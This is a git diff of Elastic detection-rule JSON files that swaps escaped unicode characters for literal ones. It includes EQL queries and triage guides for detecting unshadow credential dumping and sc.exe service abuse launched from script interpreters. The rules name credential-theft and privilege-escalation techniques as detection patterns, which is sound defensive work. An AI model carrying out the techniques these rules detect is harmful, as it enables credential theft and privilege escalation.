a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_5.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_5.json index 854c4ca0f78..a541a568361 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_5.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_5.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_6.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_6.json index 9302ca0b4a4..65d3d8a9b20 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_6.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_6.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_102.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_102.json index c3a1075d842..1802f2a3744 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_102.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_103.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_103.json index 5d0108488eb..65107de23c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_103.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_104.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_104.json index 5281b47191b..a0528f04d14 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_104.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_205.json b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_205.json index 779831eacf3..d3be5d36f2c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cd5982-17c8-4959-874c-633acde7d426_205.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_103.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_103.json index f59807babad..1d62280c780 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_103.json @@ -70,7 +70,7 @@ ], "risk_score": 21, "rule_id": "e8571d5f-bea1-46c2-9f56-998de2d3ed95", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_104.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_104.json index d0766c15971..c51e44958b7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_104.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_105.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_105.json index acf4481386a..9dfd85ee216 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_105.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_106.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_106.json index 51d0812dec8..bafcdbf28f2 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_106.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is not inherently malicious if it occurs in isolation. As long as the analyst did not identify suspicious activity related to the user, host, and service, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service or restore it to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_107.json b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_107.json index 9a0a1fd97c4..dd2a48a0b07 100644 --- a/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_107.json +++ b/packages/security_detection_engine/kibana/security_rule/e8571d5f-bea1-46c2-9f56-998de2d3ed95_107.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Triage and analysis\n\n### Investigating Service Control Spawned via Script Interpreter\n\nWindows services are background processes that run with SYSTEM privileges and provide specific functionality or support to other applications and system components.\n\nThe `sc.exe` command line utility is used to manage and control Windows services on a local or remote computer. Attackers may use `sc.exe` to create, modify, and start services to elevate their privileges from administrator to SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the command line, registry changes events, and Windows events related to service activities (for example, 4697 and/or 7045) for suspicious characteristics.\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` 